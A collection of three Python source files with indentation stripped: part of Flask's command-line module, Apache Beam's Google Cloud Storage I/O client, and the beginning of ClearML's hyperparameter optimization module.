click.secho(f"{traceback.format_exc()}\n", err=True, fg="red")
return sorted(rv)
def main(self, *args, **kwargs):
# Set a global flag that indicates that we were invoked from the
# command line interface. This is detected by Flask.run to make the
# call into a no-op. This is necessary to avoid ugly errors when the
# script that is loaded here also attempts to start a server.
os.environ["FLASK_RUN_FROM_CLI"] = "true"
if get_load_dotenv(self.load_dotenv):
load_dotenv()
obj = kwargs.get("obj")
if obj is None:
obj = ScriptInfo(
create_app=self.create_app, set_debug_flag=self.set_debug_flag
)
kwargs["obj"] = obj
kwargs.setdefault("auto_envvar_prefix", "FLASK")
return super().main(*args, **kwargs)
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other
def load_dotenv(path=None):
"""Load "dotenv" files in order of precedence to set environment variables.
If an env var is already set it is not overwritten, so earlier files in the
list are preferred over later files.
This is a no-op if `python-dotenv`_ is not installed.
.. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
:param path: Load the file at this location instead of searching.
:return: ``True`` if a file was loaded.
.. versionchanged:: 1.1.0
Returns ``False`` when python-dotenv is not installed, or when
the given path isn't a file.
.. versionchanged:: 2.0
When loading the env files, set the default encoding to UTF-8.
.. versionadded:: 1.0
"""
if dotenv is None:
if path or os.path.isfile(".env") or os.path.isfile(".flaskenv"):
click.secho(
" * Tip: There are .env or .flaskenv files present."
' Do "pip install python-dotenv" to use them.',
fg="yellow",
err=True,
)
return False
# if the given path specifies the actual file then return True,
# else False
if path is not None:
if os.path.isfile(path):
return dotenv.load_dotenv(path, encoding="utf-8")
return False
new_dir = None
for name in (".env", ".flaskenv"):
path = dotenv.find_dotenv(name, usecwd=True)
if not path:
continue
if new_dir is None:
new_dir = os.path.dirname(path)
dotenv.load_dotenv(path, encoding="utf-8")
return new_dir is not None # at least one file was located and loaded
def show_server_banner(env, debug, app_import_path, eager_loading):
"""Show extra startup messages the first time the server is run,
ignoring the reloader.
"""
if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
return
if app_import_path is not None:
message = f" * Serving Flask app {app_import_path!r}"
if not eager_loading:
message += " (lazy loading)"
click.echo(message)
click.echo(f" * Environment: {env}")
if env == "production":
click.secho(
" WARNING: This is a development server. Do not use it in"
" a production deployment.",
fg="red",
)
click.secho(" Use a production WSGI server instead.", dim=True)
if debug is not None:
click.echo(f" * Debug mode: {'on' if debug else 'off'}")
class CertParamType(click.ParamType):
"""Click option type for the ``--cert`` option. Allows either an
existing file, the string ``'adhoc'``, or an import for a
:class:`~ssl.SSLContext` object.
"""
name = "path"
def __init__(self):
self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True)
def convert(self, value, param, ctx):
if ssl is None:
raise click.BadParameter(
'Using "--cert" requires Python to be compiled with SSL support.',
ctx,
param,
)
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == "adhoc":
try:
import cryptography # noqa: F401
except ImportError:
raise click.BadParameter(
"Using ad-hoc certificates requires the cryptography library.",
ctx,
param,
) from None
return value
obj = import_string(value, silent=True)
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx, param, value):
"""The ``--key`` option must be specified when ``--cert`` is a file.
Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
"""
cert = ctx.params.get("cert")
is_adhoc = cert == "adhoc"
is_context = ssl and isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.', ctx, param
)
if is_context:
raise click.BadParameter(
'When "--cert" is an SSLContext object, "--key is not used.', ctx, param
)
if not cert:
raise click.BadParameter('"--cert" must also be specified.', ctx, param)
ctx.params["cert"] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter('Required when using "--cert".', ctx, param)
return value
class SeparatedPathType(click.Path):
"""Click option type that accepts a list of values separated by the
OS's path separator (``:``, ``;`` on Windows). Each value is
validated as a :class:`click.Path` type.
"""
def convert(self, value, param, ctx):
items = self.split_envvar_value(value)
super_convert = super().convert
return [super_convert(item, param, ctx) for item in items]
@click.command("run", short_help="Run a development server.")
@click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.")
@click.option("--port", "-p", default=5000, help="The port to bind to.")
@click.option(
"--cert", type=CertParamType(), help="Specify a certificate file to use HTTPS."
)
@click.option(
"--key",
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key,
expose_value=False,
help="The key file to use when specifying a certificate.",
)
@click.option(
"--reload/--no-reload",
default=None,
help="Enable or disable the reloader. By default the reloader "
"is active if debug is enabled.",
)
@click.option(
"--debugger/--no-debugger",
default=None,
help="Enable or disable the debugger. By default the debugger "
"is active if debug is enabled.",
)
@click.option(
"--eager-loading/--lazy-loading",
default=None,
help="Enable or disable eager loading. By default eager "
"loading is enabled if the reloader is disabled.",
)
@click.option(
"--with-threads/--without-threads",
default=True,
help="Enable or disable multithreading.",
)
@click.option(
"--extra-files",
default=None,
type=SeparatedPathType(),
help=(
"Extra files that trigger a reload on change. Multiple paths"
f" are separated by {os.path.pathsep!r}."
),
)
@pass_script_info
def run_command(
info, host, port, reload, debugger, eager_loading, with_threads, cert, extra_files
):
"""Run a local development server.
This server is for development purposes only. It does not provide
the stability, security, or performance of production WSGI servers.
The reloader and debugger are enabled by default if
FLASK_ENV=development or FLASK_DEBUG=1.
"""
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
from werkzeug.serving import run_simple
run_simple(
host,
port,
app,
use_reloader=reload,
use_debugger=debugger,
threaded=with_threads,
ssl_context=cert,
extra_files=extra_files,
)
@click.command("shell", short_help="Run a shell in the app context.")
@with_appcontext
def shell_command() -> None:
"""Run an interactive Python shell in the context of a given
Flask application. The application will populate the default
namespace of this shell according to its configuration.
This is useful for executing small snippets of management code
without having to manually configure the application.
"""
import code
from .globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = (
f"Python {sys.version} on {sys.platform}\n"
f"App: {app.import_name} [{app.env}]\n"
f"Instance: {app.instance_path}"
)
ctx: dict = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get("PYTHONSTARTUP")
if startup and os.path.isfile(startup):
with open(startup) as f:
eval(compile(f.read(), startup, "exec"), ctx)
ctx.update(app.make_shell_context())
# Site, customize, or startup script can set a hook to call when
# entering interactive mode. The default one sets up readline with
# tab and history completion.
interactive_hook = getattr(sys, "__interactivehook__", None)
if interactive_hook is not None:
try:
import readline
from rlcompleter import Completer
except ImportError:
pass
else:
# rlcompleter uses __main__.__dict__ by default, which is
# flask.__main__. Use the shell context instead.
readline.set_completer(Completer(ctx).complete)
interactive_hook()
code.interact(banner=banner, local=ctx)
@click.command("routes", short_help="Show the routes for the app.")
@click.option(
"--sort",
"-s",
type=click.Choice(("endpoint", "methods", "rule", "match")),
default="endpoint",
help=(
'Method to sort routes by. "match" is the order that Flask will match '
"routes when dispatching a request."
),
)
@click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.")
@with_appcontext
def routes_command(sort: str, all_methods: bool) -> None:
"""Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo("No routes were registered.")
return
ignored_methods = set(() if all_methods else ("HEAD", "OPTIONS"))
if sort in ("endpoint", "rule"):
rules = sorted(rules, key=attrgetter(sort))
elif sort == "methods":
rules = sorted(rules, key=lambda rule: sorted(rule.methods)) # type: ignore
rule_methods = [
", ".join(sorted(rule.methods - ignored_methods)) # type: ignore
for rule in rules
]
headers = ("Endpoint", "Methods", "Rule")
widths = (
max(len(rule.endpoint) for rule in rules),
max(len(methods) for methods in rule_methods),
max(len(rule.rule) for rule in rules),
)
widths = [max(len(h), w) for h, w in zip(headers, widths)]
row = "{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}".format(*widths)
click.echo(row.format(*headers).strip())
click.echo(row.format(*("-" * width for width in widths)))
for rule, methods in zip(rules, rule_methods):
click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
cli = FlaskGroup(
help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd="export" if os.name == "posix" else "set",
prefix="$ " if os.name == "posix" else "> ",
)
)
def main() -> None:
cli.main()
if __name__ == "__main__":
main()
|
gcsio.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Google Cloud Storage client.
This library evolved from the Google App Engine GCS client available at
https://github.com/GoogleCloudPlatform/appengine-gcs-client.
"""
from __future__ import absolute_import
import errno
import io
import logging
import multiprocessing
import re
import sys
import threading
import time
import traceback
from builtins import object
from apache_beam.internal.http_client import get_new_http
from apache_beam.io.filesystemio import Downloader
from apache_beam.io.filesystemio import DownloaderStream
from apache_beam.io.filesystemio import PipeStream
from apache_beam.io.filesystemio import Uploader
from apache_beam.io.filesystemio import UploaderStream
from apache_beam.utils import retry
__all__ = ['GcsIO']
# Issue a friendlier error message if the storage library is not available.
# TODO(silviuc): Remove this guard when storage is available everywhere.
try:
# pylint: disable=wrong-import-order, wrong-import-position
# pylint: disable=ungrouped-imports
import apitools.base.py.transfer as transfer
from apitools.base.py.batch import BatchApiRequest
from apitools.base.py.exceptions import HttpError
from apache_beam.internal.gcp import auth
from apache_beam.io.gcp.internal.clients import storage
except ImportError:
raise ImportError(
'Google Cloud Storage I/O not supported for this execution environment '
'(could not import storage API client).')
# This is the size of each partial-file read operation from GCS. This
# parameter was chosen to give good throughput while keeping memory usage at
# a reasonable level; the following table shows throughput reached when
# reading files of a given size with a chosen buffer size and informed the
# choice of the value, as of 11/2016:
#
# +---------------+------------+-------------+-------------+-------------+
# | | 50 MB file | 100 MB file | 200 MB file | 400 MB file |
# +---------------+------------+-------------+-------------+-------------+
# | 8 MB buffer | 17.12 MB/s | 22.67 MB/s | 23.81 MB/s | 26.05 MB/s |
# | 16 MB buffer | 24.21 MB/s | 42.70 MB/s | 42.89 MB/s | 46.92 MB/s |
# | 32 MB buffer | 28.53 MB/s | 48.08 MB/s | 54.30 MB/s | 54.65 MB/s |
# | 400 MB buffer | 34.72 MB/s | 71.13 MB/s | 79.13 MB/s | 85.39 MB/s |
# +---------------+------------+-------------+-------------+-------------+
DEFAULT_READ_BUFFER_SIZE = 16 * 1024 * 1024
# This is the number of seconds the library will wait for a partial-file read
# operation from GCS to complete before retrying.
DEFAULT_READ_SEGMENT_TIMEOUT_SECONDS = 60
# This is the size of chunks used when writing to GCS.
WRITE_CHUNK_SIZE = 8 * 1024 * 1024
# Maximum number of operations permitted in GcsIO.copy_batch() and
# GcsIO.delete_batch().
MAX_BATCH_OPERATION_SIZE = 100
# Batch endpoint URL for GCS.
# We have to specify an API specific endpoint here since Google APIs global
# batch endpoints will be deprecated on 03/25/2019.
# See https://developers.googleblog.com/2018/03/discontinuing-support-for-json-rpc-and.html. # pylint: disable=line-too-long
# Currently apitools library uses a global batch endpoint by default:
# https://github.com/google/apitools/blob/master/apitools/base/py/batch.py#L152
# TODO: remove this constant and it's usage after apitools move to using an API
# specific batch endpoint or after Beam gcsio module start using a GCS client
# library that does not use global batch endpoints.
GCS_BATCH_ENDPOINT = 'https://www.googleapis.com/batch/storage/v1'
def parse_gcs_path(gcs_path, object_optional=False):
"""Return the bucket and object names of the given gs:// path."""
match = re.match('^gs://([^/]+)/(.*)$', gcs_path)
if match is None or (match.group(2) == '' and not object_optional):
raise ValueError('GCS path must be in the form gs://<bucket>/<object>.')
return match.group(1), match.group(2)
class GcsIOError(IOError, retry.PermanentException):
"""GCS IO error that should not be retried."""
pass
class GcsIO(object):
"""Google Cloud Storage I/O client."""
def __new__(cls, storage_client=None):
if storage_client:
# This path is only used for testing.
return super(GcsIO, cls).__new__(cls)
else:
# Create a single storage client for each thread. We would like to avoid
# creating more than one storage client for each thread, since each
# initialization requires the relatively expensive step of initializing
# credentaials.
local_state = threading.local()
if getattr(local_state, 'gcsio_instance', None) is None:
credentials = auth.get_service_credentials()
storage_client = storage.StorageV1(
credentials=credentials,
get_credentials=False,
http=get_new_http(),
response_encoding=None if sys.version_info[0] < 3 else 'utf8')
local_state.gcsio_instance = super(GcsIO, cls).__new__(cls)
local_state.gcsio_instance.client = storage_client
return local_state.gcsio_instance
def __init__(self, storage_client=None):
# We must do this check on storage_client because the client attribute may
# have already been set in __new__ for the singleton case when
# storage_client is None.
if storage_client is not None:
self.client = storage_client
self._rewrite_cb = None
def _set_rewrite_response_callback(self, callback):
"""For testing purposes only. No backward compatibility guarantees.
Args:
callback: A function that receives ``storage.RewriteResponse``.
"""
self._rewrite_cb = callback
def open(self,
filename,
mode='r',
read_buffer_size=DEFAULT_READ_BUFFER_SIZE,
mime_type='application/octet-stream'):
"""Open a GCS file path for reading or writing.
Args:
filename (str): GCS file path in the form ``gs://<bucket>/<object>``.
mode (str): ``'r'`` for reading or ``'w'`` for writing.
read_buffer_size (int): Buffer size to use during read operations.
mime_type (str): Mime type to set for write operations.
Returns:
GCS file object.
Raises:
~exceptions.ValueError: Invalid open file mode.
"""
if mode == 'r' or mode == 'rb':
downloader = GcsDownloader(self.client, filename,
buffer_size=read_buffer_size)
return io.BufferedReader(DownloaderStream(downloader, read_buffer_size=read_buffer_size, mode=mode),
buffer_size=read_buffer_size)
elif mode == 'w' or mode == 'wb':
uploader = GcsUploader(self.client, filename, mime_type)
return io.BufferedWriter(UploaderStream(uploader, mode=mode),
buffer_size=128 * 1024)
else:
raise ValueError('Invalid file open mode: %s.' % mode)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def delete(self, path):
"""Deletes the object at the given GCS path.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsDeleteRequest(
bucket=bucket, object=object_path)
try:
self.client.objects.Delete(request)
except HttpError as http_error:
if http_error.status_code == 404:
# Return success when the file doesn't exist anymore for idempotency.
return
raise
# We intentionally do not decorate this method with a retry, as retrying is
# handled in BatchApiRequest.Execute().
def delete_batch(self, paths):
"""Deletes the objects at the given GCS paths.
Args:
paths: List of GCS file path patterns in the form gs://<bucket>/<name>,
not to exceed MAX_BATCH_OPERATION_SIZE in length.
Returns: List of tuples of (path, exception) in the same order as the paths
argument, where exception is None if the operation succeeded or
the relevant exception if the operation failed.
"""
if not paths:
return []
batch_request = BatchApiRequest(
batch_url=GCS_BATCH_ENDPOINT,
retryable_codes=retry.SERVER_ERROR_OR_TIMEOUT_CODES,
response_encoding='utf-8')
for path in paths:
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsDeleteRequest(
bucket=bucket, object=object_path)
batch_request.Add(self.client.objects, 'Delete', request)
api_calls = batch_request.Execute(self.client._http) # pylint: disable=protected-access
result_statuses = []
for i, api_call in enumerate(api_calls):
path = paths[i]
exception = None
if api_call.is_error:
exception = api_call.exception
# Return success when the file doesn't exist anymore for idempotency.
if isinstance(exception, HttpError) and exception.status_code == 404:
exception = None
result_statuses.append((path, exception))
return result_statuses
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def copy(self, src, dest, dest_kms_key_name=None,
max_bytes_rewritten_per_call=None):
"""Copies the given GCS object from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>.
dest: GCS file path pattern in the form gs://<bucket>/<name>.
dest_kms_key_name: Experimental. No backwards compatibility guarantees.
Encrypt dest with this Cloud KMS key. If None, will use dest bucket
encryption defaults.
max_bytes_rewritten_per_call: Experimental. No backwards compatibility
guarantees. Each rewrite API call will return after these many bytes.
Used for testing.
Raises:
TimeoutError on timeout.
"""
src_bucket, src_path = parse_gcs_path(src)
dest_bucket, dest_path = parse_gcs_path(dest)
request = storage.StorageObjectsRewriteRequest(
sourceBucket=src_bucket,
sourceObject=src_path,
destinationBucket=dest_bucket,
destinationObject=dest_path,
destinationKmsKeyName=dest_kms_key_name,
maxBytesRewrittenPerCall=max_bytes_rewritten_per_call)
response = self.client.objects.Rewrite(request)
while not response.done:
logging.debug(
'Rewrite progress: %d of %d bytes, %s to %s',
response.totalBytesRewritten, response.objectSize, src, dest)
request.rewriteToken = response.rewriteToken
response = self.client.objects.Rewrite(request)
if self._rewrite_cb is not None:
self._rewrite_cb(response)
logging.debug('Rewrite done: %s to %s', src, dest)
# We intentionally do not decorate this method with a retry, as retrying is
# handled in BatchApiRequest.Execute().
def copy_batch(self, src_dest_pairs, dest_kms_key_name=None,
max_bytes_rewritten_per_call=None):
"""Copies the given GCS object from src to dest.
Args:
src_dest_pairs: list of (src, dest) tuples of gs://<bucket>/<name> files
paths to copy from src to dest, not to exceed
MAX_BATCH_OPERATION_SIZE in length.
dest_kms_key_name: Experimental. No backwards compatibility guarantees.
Encrypt dest with this Cloud KMS key. If None, will use dest bucket
encryption defaults.
max_bytes_rewritten_per_call: Experimental. No backwards compatibility
guarantees. Each rewrite call will return after these many bytes. Used
primarily for testing.
Returns: List of tuples of (src, dest, exception) in the same order as the
src_dest_pairs argument, where exception is None if the operation
succeeded or the relevant exception if the operation failed.
"""
if not src_dest_pairs:
return []
pair_to_request = {}
for pair in src_dest_pairs:
src_bucket, src_path = parse_gcs_path(pair[0])
dest_bucket, dest_path = parse_gcs_path(pair[1])
request = storage.StorageObjectsRewriteRequest(
sourceBucket=src_bucket,
sourceObject=src_path,
destinationBucket=dest_bucket,
destinationObject=dest_path,
destinationKmsKeyName=dest_kms_key_name,
maxBytesRewrittenPerCall=max_bytes_rewritten_per_call)
pair_to_request[pair] = request
pair_to_status = {}
while True:
pairs_in_batch = list(set(src_dest_pairs) - set(pair_to_status))
if not pairs_in_batch:
break
batch_request = BatchApiRequest(
batch_url=GCS_BATCH_ENDPOINT,
retryable_codes=retry.SERVER_ERROR_OR_TIMEOUT_CODES,
response_encoding='utf-8')
for pair in pairs_in_batch:
batch_request.Add(self.client.objects, 'Rewrite', pair_to_request[pair])
api_calls = batch_request.Execute(self.client._http) # pylint: disable=protected-access
for pair, api_call in zip(pairs_in_batch, api_calls):
src, dest = pair
response = api_call.response
if self._rewrite_cb is not None:
self._rewrite_cb(response)
if api_call.is_error:
exception = api_call.exception
# Translate 404 to the appropriate not found exception.
if isinstance(exception, HttpError) and exception.status_code == 404:
exception = (
GcsIOError(errno.ENOENT, 'Source file not found: %s' % src))
pair_to_status[pair] = exception
elif not response.done:
logging.debug(
'Rewrite progress: %d of %d bytes, %s to %s',
response.totalBytesRewritten, response.objectSize, src, dest)
pair_to_request[pair].rewriteToken = response.rewriteToken
else:
logging.debug('Rewrite done: %s to %s', src, dest)
pair_to_status[pair] = None
return [(pair[0], pair[1], pair_to_status[pair]) for pair in src_dest_pairs]
# We intentionally do not decorate this method with a retry, since the
# underlying copy and delete operations are already idempotent operations
# protected by retry decorators.
def copytree(self, src, dest):
"""Renames the given GCS "directory" recursively from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>/.
dest: GCS file path pattern in the form gs://<bucket>/<name>/.
"""
assert src.endswith('/')
assert dest.endswith('/')
for entry in self.list_prefix(src):
rel_path = entry[len(src):]
self.copy(entry, dest + rel_path)
# We intentionally do not decorate this method with a retry, since the
# underlying copy and delete operations are already idempotent operations
# protected by retry decorators.
def rename(self, src, dest):
"""Renames the given GCS object from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>.
dest: GCS file path pattern in the form gs://<bucket>/<name>.
"""
self.copy(src, dest)
self.delete(src)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def exists(self, path):
"""Returns whether the given GCS object exists.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
try:
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
self.client.objects.Get(request) # metadata
return True
except HttpError as http_error:
if http_error.status_code == 404:
# HTTP 404 indicates that the file did not exist
return False
else:
# We re-raise all other exceptions
raise
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def checksum(self, path):
"""Looks up the checksum of a GCS object.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
return self.client.objects.Get(request).crc32c
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def size(self, path):
"""Returns the size of a single GCS object.
This method does not perform glob expansion. Hence the given path must be
for a single GCS object.
Returns: size of the GCS object in bytes.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
return self.client.objects.Get(request).size
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def kms_key(self, path):
"""Returns the KMS key of a single GCS object.
This method does not perform glob expansion. Hence the given path must be
for a single GCS object.
Returns: KMS key name of the GCS object as a string, or None if it doesn't
have one.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
return self.client.objects.Get(request).kmsKeyName
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def last_updated(self, path):
"""Returns the last updated epoch time of a single GCS object.
This method does not perform glob expansion. Hence the given path must be
for a single GCS object.
Returns: last updated time of the GCS object in second.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
datetime = self.client.objects.Get(request).updated
return (time.mktime(datetime.timetuple()) - time.timezone
+ datetime.microsecond / 1000000.0)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def list_prefix(self, path):
"""Lists files matching the prefix.
Args:
path: GCS file path pattern in the form gs://<bucket>/[name].
Returns:
Dictionary of file name -> size.
"""
bucket, prefix = parse_gcs_path(path, object_optional=True)
request = storage.StorageObjectsListRequest(bucket=bucket, prefix=prefix)
file_sizes = {}
counter = 0
start_time = time.time()
logging.info("Starting the size estimation of the input")
while True:
response = self.client.objects.List(request)
for item in response.items:
file_name = 'gs://%s/%s' % (item.bucket, item.name)
file_sizes[file_name] = item.size
counter += 1
if counter % 10000 == 0:
logging.info("Finished computing size of: %s files", len(file_sizes))
if response.nextPageToken:
request.pageToken = response.nextPageToken
else:
break
logging.info("Finished listing %s files in %s seconds.",
counter, time.time() - start_time)
return file_sizes
class GcsDownloader(Downloader):
def __init__(self, client, path, buffer_size):
self._client = client
self._path = path
self._bucket, self._name = parse_gcs_path(path)
self._buffer_size = buffer_size
# Get object state.
self._get_request = (storage.StorageObjectsGetRequest(
bucket=self._bucket, object=self._name))
try:
metadata = self._get_object_metadata(self._get_request)
except HttpError as http_error:
if http_error.status_code == 404:
raise IOError(errno.ENOENT, 'Not found: %s' % self._path)
else:
logging.error('HTTP error while requesting file %s: %s', self._path,
http_error)
raise
self._size = metadata.size
# Ensure read is from file of the correct generation.
self._get_request.generation = metadata.generation
# Initialize read buffer state.
self._download_stream = io.BytesIO()
self._downloader = transfer.Download(
self._download_stream, auto_transfer=False, chunksize=self._buffer_size)
self._client.objects.Get(self._get_request, download=self._downloader)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def _get_object_metadata(self, get_request):
return self._client.objects.Get(get_request)
@property
def size(self):
return self._size
def get_range(self, start, end):
self._download_stream.seek(0)
self._download_stream.truncate(0)
self._downloader.GetRange(start, end - 1)
return self._download_stream.getvalue()
class GcsUploader(Uploader):
def __init__(self, client, path, mime_type):
self._client = client
self._path = path
self._bucket, self._name = parse_gcs_path(path)
self._mime_type = mime_type
# Set up communication with child thread.
parent_conn, child_conn = multiprocessing.Pipe()
self._child_conn = child_conn
self._conn = parent_conn
# Set up uploader.
self._insert_request = (storage.StorageObjectsInsertRequest(
bucket=self._bucket, name=self._name))
self._upload = transfer.Upload(
PipeStream(self._child_conn),
self._mime_type,
chunksize=WRITE_CHUNK_SIZE)
self._upload.strategy = transfer.RESUMABLE_UPLOAD
# Start uploading thread.
self._upload_thread = threading.Thread(target=self._start_upload)
self._upload_thread.daemon = True
self._upload_thread.last_error = None
self._upload_thread.start()
# TODO(silviuc): Refactor so that retry logic can be applied.
# There is retry logic in the underlying transfer library but we should make
# it more explicit so we can control the retry parameters.
@retry.no_retries # Using no_retries marks this as an integration point.
def _start_upload(self):
# This starts the uploader thread. We are forced to run the uploader in
# another thread because the apitools uploader insists on taking a stream
# as input. Happily, this also means we get asynchronous I/O to GCS.
#
# The uploader by default transfers data in chunks of 1024 * 1024 bytes at
# a time, buffering writes until that size is reached.
try:
self._client.objects.Insert(self._insert_request, upload=self._upload)
except Exception as e: # pylint: disable=broad-except
logging.error('Error in _start_upload while inserting file %s: %s',
self._path, traceback.format_exc())
self._upload_thread.last_error = e
finally:
self._child_conn.close()
def put(self, data):
try:
self._conn.send_bytes(data.tobytes())
except EOFError:
if self._upload_thread.last_error is not None:
raise self._upload_thread.last_error # pylint: disable=raising-bad-type
raise
def finish(self):
self._conn.close()
# TODO(udim): Add timeout=DEFAULT_HTTP_TIMEOUT_SECONDS * 2 and raise if
# isAlive is True.
self._upload_thread.join()
# Check for exception since the last put() call.
if self._upload_thread.last_error is not None:
raise self._upload_thread.last_error # pylint: disable=raising-bad-type
|
optimization.py
|
import hashlib
import json
import six
from copy import copy, deepcopy
from datetime import datetime
from itertools import product
from logging import getLogger
from threading import Thread, Event
from time import time
from typing import List, Set, Union, Any, Sequence, Optional, Mapping, Callable
from .job import ClearmlJob
from .parameters import Parameter
from ..backend_interface.util import get_or_create_project
from ..logger import Logger
from ..backend_api.services import workers as workers_service, tasks as tasks_service, events as events_service
from ..task import Task
logger = getLogger('clearml.automation.optimization')
class Objective(object):
"""
Optimization ``Objective`` class to maximize / minimize over all experiments. This class will sample a specific
scalar from all experiments, and maximize / minimize over single scalar (i.e., title and series combination).
``SearchStrategy`` and ``HyperParameterOptimizer`` use ``Objective`` in the strategy search algorithm.
"""
def __init__(self, title, series, order='max', extremum=False):
# type: (str, str, str, bool) -> ()
"""
Construct ``Objective`` object that will return the scalar value for a specific task ID.
:param str title: The scalar graph title to sample from.
:param str series: The scalar series title to sample from.
:param str order: The setting for maximizing or minimizing the objective scalar value.
The values are:
- ``max``
- ``min``
:param bool extremum: Return the global minimum / maximum reported metric value
The values are:
- ``True`` - Return the global minimum / maximum reported metric value.
- ``False`` - Return the last value reported for a specific Task. (Default)
"""
self.title = title
self.series = series
assert order in ('min', 'max',)
# normalize value so we always look for the highest objective value
self.sign = -1 if (isinstance(order, str) and order.lower().strip() == 'min') else +1
self._metric = None
self.extremum = extremum
def get_objective(self, task_id):
# type: (Union[str, Task, ClearmlJob]) -> Optional[float]
"""
Return a specific task scalar value based on the objective settings (title/series).
:param str task_id: The Task id to retrieve scalar from (or ``ClearMLJob`` object).
:return: The scalar value.
"""
# create self._metric
self._get_last_metrics_encode_field()
if isinstance(task_id, Task):
task_id = task_id.id
elif isinstance(task_id, ClearmlJob):
task_id = task_id.task_id()
# noinspection PyBroadException, Py
try:
# noinspection PyProtectedMember
task = Task._query_tasks(
task_ids=[task_id], only_fields=['last_metrics.{}.{}'.format(self._metric[0], self._metric[1])])[0]
except Exception:
return None
metrics = task.last_metrics
if not metrics:
return None
# noinspection PyBroadException
try:
values = metrics[self._metric[0]][self._metric[1]]
if not self.extremum:
return values['value']
return values['min_value'] if self.sign < 0 else values['max_value']
except Exception:
return None
def get_current_raw_objective(self, task):
# type: (Union[ClearmlJob, Task]) -> (int, float)
"""
Return the current raw value (without sign normalization) of the objective.
:param str task: The Task or Job to retrieve scalar from (or ``ClearmlJob`` object).
:return: Tuple(iteration, value) if, and only if, the metric exists. None if the metric does not exist.
"""
if isinstance(task, Task):
task_id = task.id
elif isinstance(task, ClearmlJob):
task_id = task.task_id()
else:
task_id = task
if not task_id:
raise ValueError("Task ID not provided")
# send request
# noinspection PyBroadException
try:
# noinspection PyProtectedMember
res = Task._get_default_session().send(
events_service.ScalarMetricsIterHistogramRequest(
task=task_id, key='iter', samples=None),
)
except Exception:
res = None
if not res:
return None
response = res.wait()
if not response.ok() or not response.response_data:
return None
scalars = response.response_data
# noinspection PyBroadException
try:
return scalars[self.title][self.series]['x'][-1], scalars[self.title][self.series]['y'][-1]
except Exception:
return None
def get_objective_sign(self):
# type: () -> float
"""
Return the sign of the objective.
- ``+1`` - If maximizing
- ``-1`` - If minimizing
:return: Objective function sign.
"""
return self.sign
def get_objective_metric(self):
# type: () -> (str, str)
"""
Return the metric title, series pair of the objective.
:return: (title, series)
"""
return self.title, self.series
def get_normalized_objective(self, task_id):
# type: (Union[str, Task, ClearmlJob]) -> Optional[float]
"""
Return a normalized task scalar value based on the objective settings (title/series).
I.e. objective is always to maximize the returned value
